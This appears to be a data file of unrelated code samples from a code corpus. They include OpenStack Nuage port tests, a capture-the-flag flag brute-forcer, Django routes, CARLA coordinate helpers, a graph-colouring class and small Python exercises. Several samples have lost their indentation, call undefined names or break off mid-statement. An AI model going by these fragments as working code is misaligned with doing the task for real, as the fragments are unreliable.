vip_mismatch = False
if valid_vips and not nuage_vport_vips:
vip_mismatch = True
for nuage_vport_vip in nuage_vport_vips:
if nuage_vport_vip['virtualIP'] not in valid_vips:
vip_mismatch = True
self.assertEqual(vip_mismatch, False)
fixed_ips = [
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.6",
"subnet_id": subnet["id"]
}
]
port = self.update_port(port=port, fixed_ips=fixed_ips)
self.assertIsNotNone(port, "Unable to update port")
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.ENABLED,
nuage_vport[0]['addressSpoofing'])
nuage_vport_vips = self.vsd_client.get_virtual_ip(
constants.VPORT,
nuage_vport[0]['ID'])
valid_vips = [fixed_ips[0]["ip_address"],
allowed_address_pairs[0]['ip_address']]
vip_mismatch = False
mac_mismatch = False
if valid_vips and not nuage_vport_vips:
vip_mismatch = True
for nuage_vport_vip in nuage_vport_vips:
if nuage_vport_vip['virtualIP'] not in valid_vips:
vip_mismatch = True
self.assertEqual(vip_mismatch, False)
if nuage_vport_vip['MAC'] != port['mac_address']:
mac_mismatch = True
self.assertEqual(vip_mismatch, False)
self.assertEqual(mac_mismatch, False)
    @decorators.attr(type='smoke')
    def test_nuage_port_create_fixed_ips_same_subnet_with_aap_router_attach(
            self):
        """AAP port behaviour across an L2 -> L3 transition.

        The port is created while the subnet is still an L2 domain on VSD
        (spoofing ENABLED).  After the subnet is attached to a router the
        vport lives under an L3 subnetwork: spoofing must become INHERITED
        and the virtual ips must match the first fixed ip plus the AAP.
        """
        # Set up resources
        # Base resources
        network = self.create_network()
        self.assertIsNotNone(network, "Unable to create network")
        subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
                                    mask_bits=28)
        self.assertIsNotNone(subnet, "Unable to create subnet")
        router = self.create_router(
            admin_state_up=True,
            external_network_id=CONF.network.public_network_id)
        self.assertIsNotNone(router, "Unable to create router")
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            },
            {
                "ip_address": "10.0.0.5",
                "subnet_id": subnet["id"]
            }
        ]
        allowed_address_pairs = [{'ip_address': '10.0.0.6',
                                  'mac_address': 'fe:a0:36:4b:c8:70'}]
        port = self.create_port(network=network, fixed_ips=fixed_ips,
                                allowed_address_pairs=allowed_address_pairs)
        self.assertIsNotNone(port, "Unable to create port on network")
        # Before router attach the parent is an L2 domain.
        vsd_vport_parent = self.vsd_client.get_global_resource(
            constants.L2_DOMAIN,
            filters='externalID',
            filter_value=subnet['id'])[0]
        nuage_vport = self.vsd_client.get_vport(
            constants.L2_DOMAIN,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.ENABLED,
                         nuage_vport[0]['addressSpoofing'])
        # Attach subnet
        self.create_router_interface(router_id=router["id"],
                                     subnet_id=subnet["id"])
        # After attach the subnet becomes an L3 subnetwork on VSD.
        vsd_vport_parent = self.vsd_client.get_global_resource(
            constants.SUBNETWORK,
            filters='externalID',
            filter_value=subnet['id'])[0]
        nuage_vport_vips = self.vsd_client.get_virtual_ip(
            constants.VPORT,
            nuage_vport[0]['ID'])
        valid_vips = ['10.0.0.4', allowed_address_pairs[0]['ip_address']]
        vip_mismatch = False
        if valid_vips and not nuage_vport_vips:
            vip_mismatch = True
        for nuage_vport_vip in nuage_vport_vips:
            if nuage_vport_vip['virtualIP'] not in valid_vips:
                vip_mismatch = True
        self.assertEqual(vip_mismatch, False)
        nuage_vport = self.vsd_client.get_vport(
            constants.SUBNETWORK,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.INHERITED,
                         nuage_vport[0]['addressSpoofing'])
    @decorators.attr(type='smoke')
    @testtools.skipIf(Topology.before_nuage('5.4'), 'Unsupported pre-5.4')
    def test_nuage_port_update_fixed_ips_same_subnet_with_aap_router_detach(
            self):
        """AAP port behaviour across an L3 -> L2 transition.

        The port starts under an L3 subnetwork (spoofing INHERITED), gets
        an AAP via update, then the subnet is detached from the router.
        Back in the L2 domain spoofing must be ENABLED on 5.4+ (INHERITED
        on older releases).
        """
        # Set up resources
        # Base resources
        network = self.create_network()
        self.assertIsNotNone(network, "Unable to create network")
        subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
                                    mask_bits=28)
        self.assertIsNotNone(subnet, "Unable to create subnet")
        router = self.create_router(
            admin_state_up=True,
            external_network_id=CONF.network.public_network_id)
        self.assertIsNotNone(router, "Unable to create router")
        # Attach subnet (cleanup=False: the interface is removed manually
        # below as part of the scenario).
        self.create_router_interface(router_id=router["id"],
                                     subnet_id=subnet["id"], cleanup=False)
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            }
        ]
        port = self.create_port(network=network, fixed_ips=fixed_ips)
        self.assertIsNotNone(port, "Unable to create port on network")
        vsd_vport_parent = self.vsd_client.get_global_resource(
            constants.SUBNETWORK,
            filters='externalID',
            filter_value=subnet['id'])[0]
        nuage_vport = self.vsd_client.get_vport(
            constants.SUBNETWORK,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.INHERITED,
                         nuage_vport[0]['addressSpoofing'])
        # update within subnet should succeed
        fixed_ips = [
            {
                "ip_address": "10.0.0.4",
                "subnet_id": subnet["id"]
            },
            {
                "ip_address": "10.0.0.5",
                "subnet_id": subnet["id"]
            }
        ]
        allowed_address_pairs = [{'ip_address': '10.0.0.6',
                                  'mac_address': 'fe:a0:36:4b:c8:70'}]
        port = self.update_port(port=port, fixed_ips=fixed_ips,
                                allowed_address_pairs=allowed_address_pairs)
        self.assertIsNotNone(port, "Unable to update port")
        nuage_vport = self.vsd_client.get_vport(
            constants.SUBNETWORK,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.INHERITED,
                         nuage_vport[0]['addressSpoofing'])
        valid_vips = ['10.0.0.4', allowed_address_pairs[0]['ip_address']]
        nuage_vport_vips = self.vsd_client.get_virtual_ip(
            constants.VPORT,
            nuage_vport[0]['ID'])
        vip_mismatch = False
        if valid_vips and not nuage_vport_vips:
            vip_mismatch = True
        for nuage_vport_vip in nuage_vport_vips:
            if nuage_vport_vip['virtualIP'] not in valid_vips:
                vip_mismatch = True
        self.assertEqual(vip_mismatch, False)
        # Detach the subnet: the vport moves back under an L2 domain.
        self.admin_routers_client.remove_router_interface(
            router['id'],
            subnet_id=subnet['id'])
        vsd_vport_parent = self.vsd_client.get_global_resource(
            constants.L2_DOMAIN,
            filters='externalID',
            filter_value=subnet['id'])[0]
        nuage_vport = self.vsd_client.get_vport(
            constants.L2_DOMAIN,
            vsd_vport_parent['ID'],
            filters='externalID',
            filter_value=port['id'])
        self.assertEqual(constants.ENABLED if Topology.from_nuage('5.4')
                         else constants.INHERITED,
                         nuage_vport[0]['addressSpoofing'])
    @decorators.attr(type='smoke')
    @testtools.skipIf(Topology.before_nuage('5.4'), 'Unsupported pre-5.4')
    def test_delete_unbound_port_with_hanging_vminterface(self):
        """Deleting an unbound port must clean up a leftover VSD VM.

        Regression test for OPENSTACK-2797: a fake VM interface is created
        directly on the vport to simulate a port that was bound, had a VM,
        then was unbound leaving the VM behind on VSD.  Deleting the port
        must remove the vport (and the hanging VM) anyway.
        """
        # OPENSTACK-2797
        network = self.create_network()
        self.assertIsNotNone(network, "Unable to create network")
        subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
                                    mask_bits=28)
        self.assertIsNotNone(subnet, "Unable to create subnet")
        # cleanup=False: deletion is the behaviour under test; a best-effort
        # cleanup is still registered in case the test fails early.
        port = self.create_port(network=network, cleanup=False)
        self.addCleanup(self._try_delete,
                        self.manager.ports_client.delete_port,
                        port['id'])
        # Find vport
        l2domain = self.vsd.get_l2domain(by_subnet_id=subnet['id'])
        vport = self.vsd.get_vport(l2domain=l2domain, by_port_id=port['id'])
        # Create "Fake" VM interface to simulate following behavior:
        # -> Port is being bound -> VM created -> port deleted ->
        # Port not bound but leftover VM on VSD
        vminterface = self.vsd.vspk.NUVMInterface(
            name='test-fip-vm', vport_id=vport.id,
            external_id=self.vsd.external_id(port['id']),
            mac='E6:04:AA:7A:AA:86', ip_address='10.0.0.10')
        vm = self.vsd.vspk.NUVM(name='test-port-delete-vm',
                                uuid='1339f7f4-f7a0-445f-b257-8dbfaf0d6fc8',
                                external_id=self.vsd.external_id(
                                    '1339f7f4-f7a0-445f-b257-8dbfaf0d6fc8'),
                                interfaces=[vminterface])
        # Impersonate tenant user for appropriate permissions on VM
        self.vsd.session().impersonate(port['tenant_id'],
                                       self.default_netpartition_name)
        self.vsd.session().user.create_child(vm)
        self.vsd.session().stop_impersonate()
        # Delete port, VM should be deleted in this request
        self.delete_port(port)
        # Verify that vport is deleted
        vport = self.vsd.get_vport(l2domain=l2domain, by_port_id=port['id'])
        self.assertIsNone(vport, 'Vport not deleted by Port delete statement')
| StarcoderdataPython |
11324931 | from sympy import isprime, prime
# Target ciphertext: per-character binary-digit encodings of the
# transformed flag, as produced by Ord()/x0r()/b1n() below.
solution = [1001100000110, 1001100000100, 1001100000100, 1001100000000, 1001101100010, 1001101100111, 1001101001100, 1001101001111, 1001100000111, 1001101000101, 1001101101000, 1001100000011, 1001101011001, 1001101110011, 1001101101000, 1001101110101, 1001101011110, 1001101011001, 1001100000011, 1001011001010, 1001101100101, 1001101001110, 1001101101000, 1001101110010, 1001101011001, 1001001111100, 1001100000111, 1001101010011, 1001100000100, 1001101000101, 1001101101000, 1001100000011, 1001101000101, 1001100000100, 1001101101000, 1001101000011, 1001101111111, 1001100000100, 1001101101000, 1001101100000, 1001100000100, 1001100000011, 1000101111100, 1001100000100, 1001111000110, 1001101000011, 1001101101000, 1001100001111, 1001100000111, 1001100000000, 1001100001110, 1001100000111, 1001100000000, 1001111000110, 1001100000001, 1001101001010]
# Printable ASCII candidates used to brute-force the flag one character
# at a time.
chars = [chr(x) for x in range(33, 126)]
def Ord(flag):
    """Encode *flag* like the challenge does: code points -> XOR stage."""
    codes = [ord(ch) for ch in flag]
    return x0r(codes)
def x0r(listt):
    """XOR stage: primes are first mapped to the n-th prime, then every
    value is XORed with 0x1337 and handed to the binary encoder."""
    transformed = []
    for value in listt:
        key = prime(value) if isprime(value) else value
        transformed.append(key ^ 0x1337)
    return b1n(transformed)
def b1n(listt):
    """Return each integer's binary digits re-read as a base-10 int
    (e.g. 5 -> 101)."""
    return [int(bin(value)[2:]) for value in listt]
if __name__ == "__main__":
stuff = '1337UP{'
i = len(stuff)
while True:
for c in chars:
tmp = stuff + c
encrypted = Ord(tmp)
if encrypted[i] == solution[i]:
stuff += c
break
print(stuff)
i+=1
| StarcoderdataPython |
1807276 | """bubblepopApi URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from apiapp import views as view
# Route table for the apiapp views.
# NOTE(review): every regex is anchored only at the start ('^') with no
# trailing '$', so e.g. r'^test' also matches '/tester' -- confirm this
# prefix matching is intended.
urlpatterns = [
    url(r'^test', view.test),
    url(r'^check', view.check_url),
    url(r'^articles', view.find_articles),
    url(r'^blacklist', view.blacklist),
    url(r'^change', view.change_blacklist),
    url(r'^report', view.report),
    url(r'^force_crawl', view.force_crawl),
    url(r'^update_media', view.update_media),
]
| StarcoderdataPython |
9625674 | <gh_stars>1-10
from typing import Tuple
import numpy as np
import cv2
CAMERA_Z_OFFSET = 1.4
CAMERA_FORWARD_OFFSET = 2.0
PIXELS_PER_METER = 5
PIXEL_OFFSET = 10 # CAMERA_FORWARD_OFFSET * PIXELS_PER_METER
# For the world map as used by the teacher (and visualization)
BIRDVIEW_OFFSET = (-80.0, 160.0)
BIRDVIEW_IMAGE_SIZE = 320
BIRDVIEW_CROP_SIZE = 192
def carla_to_opencv(carla_xyz: np.ndarray) -> np.ndarray:
    """Convert Carla left-handed (X fwd, Y right, Z up) coordinates to
    OpenCV convention (X right, Y down, Z forward)."""
    right = carla_xyz[..., 0]
    down = -carla_xyz[..., 2]
    forward = carla_xyz[..., 1]
    return np.array([right, down, forward]).T
def world_coordinate_to_ego_coordinate(
    location_x: float,
    location_y: float,
    current_location_x: float,
    current_location_y: float,
    current_forward_x: float,
    current_forward_y: float,
) -> Tuple[float, float]:
    """Express a world location in the egocentric top-down frame.

    Carla uses Unreal's left-handed system (X forward, Y right, Z up);
    the result is a right-handed top-down frame where X points right and
    Y points forward, relative to the current location and orientation.

    :param location_x: x-component of the world location.
    :param location_y: y-component of the world location.
    :param current_location_x: x-component of the current world location.
    :param current_location_y: y-component of the current world location.
    :param current_forward_x: x-component of the current forward vector.
    :param current_forward_y: y-component of the current forward vector.
    :return: (lateral, longitudinal) egocentric coordinates.
    """
    delta_x = location_x - current_location_x
    delta_y = location_y - current_location_y
    # Rotate the displacement into the ego frame (2-D rotation by the
    # forward direction).
    lateral = current_forward_x * delta_y - current_forward_y * delta_x
    longitudinal = current_forward_x * delta_x + current_forward_y * delta_y
    return lateral, longitudinal
def ego_coordinate_to_world_coordinate(
    egocentric_x: float,
    egocentric_y: float,
    current_location_x: float,
    current_location_y: float,
    current_forward_x: float,
    current_forward_y: float,
) -> Tuple[float, float]:
    """Inverse of :func:`world_coordinate_to_ego_coordinate`.

    :param egocentric_x: lateral component of an egocentric coordinate.
    :param egocentric_y: longitudinal component of an egocentric coordinate.
    :param current_location_x: x-component of the current world location.
    :param current_location_y: y-component of the current world location.
    :param current_forward_x: x-component of the current forward vector.
    :param current_forward_y: y-component of the current forward vector.
    :return: (x, y) in world top-down coordinates.
    """
    # Rotate the ego-frame offset back into the world frame, then
    # translate by the current location.
    delta_x = current_forward_x * egocentric_y - current_forward_y * egocentric_x
    delta_y = current_forward_x * egocentric_x + current_forward_y * egocentric_y
    return current_location_x + delta_x, current_location_y + delta_y
def ego_coordinate_to_image_coordinate(
    egocentric_x: float,
    egocentric_y: float,
    fov: float = 90.0,
    image_width: int = 384,
    image_height: int = 160,
    forward_offset: float = 5.4,
) -> Tuple[float, float]:
    """Project an egocentric top-down coordinate into the forward camera.

    :param egocentric_x: lateral component of the egocentric coordinate.
    :param egocentric_y: longitudinal component of the egocentric coordinate.
    :param fov: horizontal field of view in degrees.
    :param image_width: image width in pixels.
    :param image_height: image height in pixels.
    :param forward_offset: constant shift that keeps near-zero locations
        inside the frame (they would otherwise project outside the view).
    :return: (x, y) pixel coordinates of the projected ground point.
    """
    shifted_y = egocentric_y + forward_offset - CAMERA_FORWARD_OFFSET
    point_3d = np.array([egocentric_x, CAMERA_Z_OFFSET, shifted_y])
    # Pinhole intrinsics derived from the horizontal FOV.
    focal_length = image_width / (2 * np.tan(fov / 360.0 * np.pi))
    camera_matrix = np.array(
        [
            [focal_length, 0.0, image_width / 2.0],
            [0.0, focal_length, image_height / 2.0],
            [0.0, 0.0, 1.0],
        ]
    )
    no_rotation = np.array([0.0, 0.0, 0.0])
    no_translation = np.array([0.0, 0.0, 0.0])
    projected = cv2.projectPoints(
        point_3d, no_rotation, no_translation, camera_matrix, None,
    )
    image_x, image_y = projected[0][0][0]
    return image_x, image_y
def image_coordinate_to_ego_coordinate(
    image_x: float,
    image_y: float,
    fov: float = 90.0,
    image_width: int = 384,
    image_height: int = 160,
    forward_offset: float = 5.4,
):
    """Back-project an image pixel to the egocentric ground plane.

    Assumes the point lies on flat ground parallel to the camera; inverse
    of :func:`ego_coordinate_to_image_coordinate`.

    :param image_x: x-component of the image coordinate.
    :param image_y: y-component of the image coordinate.
    :param fov: horizontal field of view in degrees.
    :param image_width: image width in pixels.
    :param image_height: image height in pixels.
    :param forward_offset: the constant shift applied by the forward
        projection, undone here.
    :return: (lateral, longitudinal) egocentric world coordinates.
    """
    focal_length = image_width / (2 * np.tan(fov / 360.0 * np.pi))
    # Normalized ray through the pixel.
    ray_x = (image_x - image_width / 2.0) / focal_length
    ray_y = (image_y - image_height / 2.0) / focal_length
    # Intersect the ray with the ground plane (camera height fixed).
    longitudinal = CAMERA_Z_OFFSET / ray_y
    lateral = longitudinal * ray_x
    return lateral, longitudinal - forward_offset + CAMERA_FORWARD_OFFSET
def world_coordinate_to_birdview_coordinate(
    location_x: float,
    location_y: float,
    current_location_x: float,
    current_location_y: float,
    current_forward_x: float,
    current_forward_y: float,
):
    """Map a world location into the cropped birdview image frame.

    Based on the LearningByCheating image_lmdb dataset code.

    :param location_x: x-component of the world location.
    :param location_y: y-component of the world location.
    :param current_location_x: x-component of the current world location.
    :param current_location_y: y-component of the current world location.
    :param current_forward_x: x-component of the current forward vector.
    :param current_forward_y: y-component of the current forward vector.
    """
    dx_pixels = (location_x - current_location_x) * PIXELS_PER_METER
    dy_pixels = (location_y - current_location_y) * PIXELS_PER_METER
    # Rotate the pixel displacement into the ego frame.
    pixel_x = dy_pixels * current_forward_x - dx_pixels * current_forward_y
    pixel_y = BIRDVIEW_IMAGE_SIZE - (
        dx_pixels * current_forward_x + dy_pixels * current_forward_y
    )
    # Apply the fixed map offset, then shift into the cropped frame.
    pixel_x += BIRDVIEW_OFFSET[1]
    pixel_y += BIRDVIEW_OFFSET[0]
    pixel_x -= (BIRDVIEW_IMAGE_SIZE - BIRDVIEW_CROP_SIZE) // 2
    pixel_y = BIRDVIEW_CROP_SIZE - (BIRDVIEW_IMAGE_SIZE - pixel_y) + 70
    pixel_y += PIXEL_OFFSET
    return pixel_x, pixel_y
| StarcoderdataPython |
380157 | try:
import networkx as nx
except Exception as e:
pass
try:
import graph_tool as gt
from graph_tool import topology
except Exception as e:
pass
class Graph:
    '''
    Class for a variety of graph-coloring problems, built on networkx and
    graph_tool.  graph_tool is the default backend and provides a native
    sequential coloring algorithm; a recursive-largest-first (RLF)
    variant is implemented by hand.
    '''
    def __init__(self,
                 generate=True,
                 vertices=None,
                 edges=None,
                 verbose=False,
                 graph=None,
                 **kwargs):
        # Build a networkx graph from (v, e) edge pairs, or wrap an
        # existing graph object as-is.
        # NOTE(review): generate=True builds a networkx.Graph, but
        # color()/recursive_largest_first() use the graph_tool API
        # (get_vertices, new_vertex_property, ...) -- confirm callers
        # pass a graph_tool graph via graph= for coloring.
        # NOTE(review): 'vertices' and 'verbose' are accepted but never
        # stored on self; the dead tail of recursive_largest_first reads
        # self.verbose, which is never set.
        if generate:
            self.g = nx.Graph()
            for (v,e) in edges:
                self.g.add_edge(v,e)
        else:
            self.g = graph
    def color(self,
              method='gt',
              strategy='largest_first',
              **kwargs
              ):
        '''
        Select a coloring method and strategy.

        Results are stored in self.colors, a dict mapping color index to
        the list of vertices assigned that color.  The default is the
        graph_tool implementation with a largest-first vertex ordering.
        '''
        if method=='greedy':
            # NOTE(review): greedy_color is not defined or imported in
            # this module (presumably networkx's greedy_color) -- this
            # branch raises NameError as written.
            alg = greedy_color(self.g,strategy=strategy)
            self.colors = {}
            nc = 0
            # Invert {vertex: color} into {color: [vertices]}.
            for k,v in alg.items():
                try:
                    self.colors[v].append(k)
                except Exception as e:
                    self.colors[v]=[k]
                    print(e)
                nc+=1
        elif method=='gt':
            if strategy in ['default']:
                self.alg = gt.topology.sequential_vertex_coloring(self.g)
                # NOTE(review): self.colors is not initialized in this
                # branch before being indexed; the AttributeError raised
                # by the first access is caught, but the assignment in the
                # except clause fails for the same reason.
                for n,i in enumerate(self.alg.a):
                    try:
                        self.colors[i].append(n)
                    except Exception:
                        self.colors[i]=[n]
            elif strategy in ['rlf']:
                self.recursive_largest_first()
            elif strategy in ['largest_first','lf']:
                # Order vertices by decreasing total degree and feed that
                # ordering to graph_tool's sequential coloring.
                v = self.g.get_vertices()
                g = self.g.get_total_degrees(self.g.get_vertices())
                ordering = sorted(v,key=lambda i:g[i],reverse=True)
                ord_vpm = self.g.new_vertex_property('int')
                for n,i in enumerate(ordering):
                    ord_vpm[n]=i
                alg = gt.topology.sequential_vertex_coloring(
                    self.g,
                    order=ord_vpm,
                )
                self.colors = {}
                nc = 0
                for n,i in enumerate(alg.a):
                    try:
                        self.colors[i].append(n)
                    except Exception:
                        self.colors[i]=[n]
                    nc+=1
    def recursive_largest_first(self):
        pass
        '''
        based on "A new efficient RLF-like algorithm for the Vertex Coloring
        Problem." Adegbindin, <NAME>. 2015
        note, we need to convert the graph to its complement graph, which then
        can be mapped to a coloring problem
        C refers to a color class under construction, with two sets: W and V,
        which represent uncolored vertices and uncolored vertices with neighbors
        in C. repectively. First v in U has largest number of neighbors in U.
        Then, while U is not empty, find w in U with largest neighbors in W.
        Then move that to C and also move neigbhors of w to W. When U is empty,
        proceed to next color class.
        '''
        # NOTE(review): the leading 'pass' makes the string above a no-op
        # literal rather than the method docstring; the body below still
        # executes.
        self.coloring = {}
        done = False
        k = -1
        N = self.g.num_vertices()
        N_assigned = 0
        # Per-vertex flags: already colored, and assigned color index.
        assigned = self.g.new_vertex_property('bool')
        colors = self.g.new_vertex_property('int')
        while N_assigned<N:
            # Hide already-colored vertices, then start a new color class
            # from the highest-degree remaining vertex.
            self.g.set_vertex_filter(assigned,inverted=True)
            k+=1
            vertices = self.g.get_vertices()
            degrees = self.g.get_total_degrees(vertices)
            v2i = {i:n for n,i in enumerate(vertices)}
            lf = sorted(
                vertices,
                key=lambda i:degrees[v2i[i]],
                reverse=True)
            v = lf[0]
            condition=True
            # Cv
            Nu = self.g.num_vertices()
            # W marks vertices adjacent to the class under construction;
            # Aw/Au count neighbors inside/outside W.
            W = self.g.new_vertex_property('bool')
            Aw = self.g.new_vertex_property('int')
            Au = self.g.get_total_degrees(vertices)
            W[v]=1
            for i in self.g.get_all_neighbors(v):
                W[i]=1
                Aw[i]+=1
                Au[v2i[i]]-=1
            assigned[v]=1
            N_assigned+=1
            colors[v]=k
            j=0
            # NOTE(review): 'j<10' caps this inner loop at 10 iterations,
            # which may terminate a color class early on large graphs --
            # confirm intended.
            while np.sum(W.get_array())<Nu and j<10:
                j+=1
                # sort according to W
                # element in U: W=0
                def sort_U(i):
                    a = (1-W.get_array()[i])
                    b = Aw[i]
                    return (a,b)
                large_w = sorted(
                    vertices,
                    key=lambda i:sort_U(i),
                    reverse=True)
                u = large_w[0]
                assigned[u]=1
                N_assigned+=1
                colors[u]=k
                neighbor_u = self.g.get_all_neighbors(u)
                Aw[u]=1
                W[u]=1
                for i in neighbor_u:
                    W[i]=1
                    Aw[i]+=1
        # Invert the per-vertex color map into {color: [vertices]}.
        self.colors = {}
        for n,c in enumerate(colors.get_array()):
            try:
                self.colors[c].append(n)
            except Exception:
                self.colors[c]=[n]
        self.g.clear_filters()
    def _find_uncolored_vertices():
        # NOTE(review): dead/broken leftover code -- the def takes no
        # 'self' yet the body references self, and it uses undefined
        # names (iteration, U, N, k) plus modules that are not imported
        # here (timeit, copy).  Kept as-is pending a decision to delete.
        pass
        #iteration = 0
        if self.verbose:
            t0 = timeit.default_timer()
        while len(self.coloring.keys())<len(N):
            iteration+=1
            # get Au
            k+=1
            Au = {}
            for u in U:
                Au[u]=0
                for uu in U:
                    if uu in self.paths[u] and not u==uu:
                        Au[u]+=1
            v = sorted(Au.items(),key=lambda k:k[1])[-1][0]
            Cv,U = self._rlf_generate_Cv(v,U)
            for i in Cv:
                self.coloring[i]=k
            if iteration%10==0:
                if self.verbose:
                    t = timeit.default_timer()
                    print('Time after 10 iterations: {}'.format(t-t0))
                    t0 = copy(t)
    def _rlf_generate_Cv(self,v,U):
        '''
        Subroutine that builds one RLF color class Cv starting from vertex
        v, consuming vertices from the uncolored set U.  Returns the class
        and the remaining frontier W.
        '''
        W = []
        Cv = [v]
        U.remove(v)
        # Move v's uncolored neighbors out of U into the frontier W.
        for u in reversed(U):
            if v in self.paths[u]:
                W.append(u)
                U.remove(u)
        while len(U)>0:
            # Pick the vertex in U with the most neighbors in W.
            Aw = {}
            for u in U:
                Aw[u]=0
                neighbor = self.paths[u]
                for uu in W:
                    if uu in neighbor and not uu==u:
                        Aw[u]+=1
            u = sorted(Aw.items(),key=lambda k:k[1])[-1][0]
            Cv.append(u)
            U.remove(u)
            for ur in reversed(U):
                if u in self.paths[ur]:
                    W.append(ur)
                    U.remove(ur)
        return Cv,W[:]
1741878 | # Copyright 2015 <NAME>, S.L.
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from . import controllers
| StarcoderdataPython |
1995723 | <reponame>Crunch-io/crunchbot<filename>tests/unit/test_config_mod.py<gh_stars>1-10
from unittest import mock
import pmxbot.config_
@mock.patch('pmxbot.config', {})
def test_config_append():
    """
    += should append an item to a list
    """
    # Start from an empty list and run the chat-command handler with
    # 'foo += {...}'; the parsed value must land as the list's first item
    # (the bare identifier foo is parsed as the string 'foo').
    pmxbot.config['foo'] = []
    text = 'foo += {"a": 3, "b": foo}'
    pmxbot.config_.config(None, None, None, None, text)
    assert pmxbot.config['foo'][0] == {'a': 3, 'b': 'foo'}
| StarcoderdataPython |
4992693 | <gh_stars>0
"""
Exercício Python #101 - Funções para votação
Crie um programa que tenha uma função chamada voto() que vai receber como parâmetro
o ano de nascimento de uma pessoa, retornando um valor literal indicando se uma pessoa tem voto NEGADO,
OPCIONAL e OBRIGATÓRIO nas eleições.
"""
from pattern import title, end, prof
from datetime import date
title("Voting Functions")
def vote(i):
    """Return the English voting status for someone born in year *i*."""
    age = date.today().year - i
    if age < 16:
        return f"\nWith {age} years » Cannot vote."
    if age < 18 or age > 65:
        return f"\nWith {age} years » Optional vote."
    return f"\nWith {age} years » Mandatory vote."
# Interactive English version: prompt for the birth year and print the
# voting status.
i = int(input("Type date of birth » "))
# NOTE(review): the line below is a tuple expression -- print runs first,
# then end() and prof() for their side effects; confirm that is intended.
print(vote(i)), end(), prof()
def voto(ano):
    """Return the Portuguese voting status for someone born in *ano*."""
    idade = date.today().year - ano
    if idade < 16:
        return f'Com {idade} anos: NÃO VOTA.'
    if 16 <= idade < 18 or idade > 65:
        return f'Com {idade} anos: VOTO OPCIONAL.'
    return f'Com {idade} anos: VOTO OBRIGATÓRIO.'
# Interactive Portuguese version: prompt for the birth year and print the
# voting status.
nasc = int(input("Em que ano você nasceu? "))
print(voto(nasc))
1788810 | import numpy as np
import pandas as pd
import pytest
from sklearn.datasets import load_boston, load_breast_cancer
from vivid.env import Settings
@pytest.fixture(scope='function', autouse=True)
def stop_logging():
    # Raise vivid's log level to WARNING for every test, restoring the
    # previous level afterwards.
    before = Settings.LOG_LEVEL
    Settings.LOG_LEVEL = 'WARNING'
    yield
    Settings.LOG_LEVEL = before
@pytest.fixture
def regression_data() -> [pd.DataFrame, np.ndarray]:
    # Boston-housing regression fixture: feature DataFrame plus target array.
    # NOTE(review): load_boston(True) relies on the deprecated positional
    # return_X_y argument, and load_boston itself was removed in
    # scikit-learn 1.2 -- confirm the pinned sklearn version.
    X, y = load_boston(True)
    return pd.DataFrame(X), y
@pytest.fixture
def binary_data() -> [pd.DataFrame, np.ndarray]:
    # Breast-cancer binary-classification fixture: feature DataFrame plus
    # target array.
    # NOTE(review): positional return_X_y is deprecated in newer
    # scikit-learn -- confirm the pinned version.
    x, y = load_breast_cancer(True)
    return pd.DataFrame(x), y
| StarcoderdataPython |
1926322 | <filename>Computer networks/socket/thread/timeout_utils.py
# <NAME> - Data - versione
import signal, os, sys
import time #sleep
import optparse
parser = optparse.OptionParser()
parser.add_option('-t', '--timeout', dest="timeout", default=2, )
parser.add_option('-s', '--sleeptime', dest="sleeptime", default=0.5, )
parser.add_option('-v', '--verbose',dest="verbose", default=False, action="store_true", )
parser.add_option('--version', dest="version", default=1.0, type="float", )
options, remainder = parser.parse_args()
N=0
def handler_alrm(signum, frame):
print('Signal handler called with signal', signum)
signal.alarm(options.timeout)
global N
# N=0
def handler_int(signum, frame):
    """SIGINT handler: log the signal number and terminate with status 0."""
    print('Signal handler called with signal', signum)
    raise SystemExit(0)
# Install both handlers and arm the first alarm (fires after options.timeout seconds).
signal.signal(signal.SIGALRM, handler_alrm)
signal.signal(signal.SIGINT, handler_int)
signal.alarm(options.timeout)
# NOTE(review): the statements below use Python 2 print syntax; this script
# does not run under Python 3 as written.
ta=time.time()
while N<10:
    print N
    N=N+1
    time.sleep(options.sleeptime)
tb=time.time()
print "tempo :", tb-ta
| StarcoderdataPython |
6598250 | # sensory PFC
# Sensory (presented-stimulus) selectivity in PFC, plotted with a shared y-range
# and saved once per highlighted task-period subset (all, PreDist+Gating, PreDist).
ylim = (-0.258832775674365, 1.9837228160819715)
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulus', 'ConcatFactor',
                      ['PreDist', 'Gating', 'PostDist'], ['PreDist', 'Gating', 'PostDist'], ['PFC'],
                      ylim_arg=ylim, selective_across=True, title='Information about Presented Stimulus (Sensory)\nPFC',
                      legend_show=True, legend_cond_show=True, percent_show=False,
                      cluster_corrected=True, plot_nonzero=True, ax=None, alpha=(1, 0.3), crop=(-50, 950))
ax[0].get_figure().savefig('figures/slides/Anova_Presented_PFC_PGP.png', format='png')
# ylim = ax.get_ylim()
ax = selectivity_plot(['Oscar', 'Gonzo'], 'PresentedStimulus', 'ConcatFactor',
                      ['PreDist', 'Gating'], ['PreDist', 'Gating', 'PostDist'], ['PFC'],
                      ylim_arg=ylim, selective_across=True, title='Information about Presented Stimulus (Sensory)\nPFC',
